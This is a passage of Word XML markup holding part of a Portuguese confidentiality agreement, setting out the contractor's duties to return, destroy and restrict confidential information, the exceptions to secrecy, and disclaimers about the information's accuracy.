          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c. Restituir toda a Informação Confidencial toda vez que esta for solicitada pela</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A9F29" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03D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1B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88AC62" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>d. Destruir toda Informação Confidencial com solicitação e consentimento da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249DFD3" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, a qual a </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>deverá provar tal destruição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C92A6" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e. Revelar a Informação Confidencial somente às pessoas cujo conhecimento é</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E329A7C" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>indispensável</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> para atender a finalidade da atividade contratada. Estas pessoas devem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D5905" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>manter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> as obrigações aqui previstas e a </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>responderá somente a elas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362CE3B8" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>f. Eliminar toda cópia eletrônica e/ou impressa da Informação Confidencial de qualquer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328C795" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>equipamento</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> informático ou outros equipamentos de apoio, salvo autorização expressa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D92BD" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, uma vez que o trabalho seja finalizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273675B" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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1050C9EE" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">4. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>está liberada de sua obrigação em guardar segredo da Informação Confidencial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065F67F6" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>caso</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1523FA33" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">a. As evidências fornecidas pela </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRANTE</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, sejam de prévio conhecimento da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204221FD" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>em período anterior à atividade contratada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241EA7E0" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b. As informações sejam publicamente conhecidas sem que resultem no descumprimento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471B025C" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>da</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ou de um terceiro sujeito a uma obrigação de confidencialidade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72364FEC" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c. Exista uma obrigação jurídica de fornecimento da informação. Neste caso a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4FC09" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATADA</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, poderá revelar somente o mínimo de Informação Confidencial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C659CF1" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>necessário</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> para o cumprimento da exigência legal. Neste caso, a informação apenas será</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142A1D1" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fornecida</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> depois da notificação formal a ambas as partes. Este direito também poderá ser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3446A7B8" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exercido</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> pela </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>no dia do vencimento do prazo para provimento desta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CFAB0" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>informação</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, descrito no requerimento jurídico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4249F84C" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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2AC74497" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">5. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>está ciente que:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F2B8C" w14:textId="77777777" w:rsidR="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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2A5679C5" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">a. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONTRATANTE</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, não outorga nenhuma garantia a respeito da Informação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528A4139" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidencial, salvo que este conteúdo é de sua propriedade e tem todo direito em </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>revelá-la</w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF50C90" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>b. A Informação Confidencial pode conter erros, ser inexata, não ser aplicável ou não se</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEFB684" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF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="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>destinar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> à questão da atividade contratada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39EDBA" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">c. A </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTRATADA </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>é exclusivamente responsável pela atualização da Informação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61B125" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="001B03DF" w:rsidP="001B03DF">
      <w:p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B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="0076245B" w:rsidRPr="001B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Confidencial, o uso que ela outorgue e os efeitos que esta atualização resulte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5913D" w14:textId="77777777" w:rsidR="0076245B" w:rsidRPr="001B03DF" w:rsidRDefault="0076245B" w:rsidP="001B03DF">
      <w:p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1B03DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">d. A Informação Confidencial tem um valor estratégico para a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03DF">
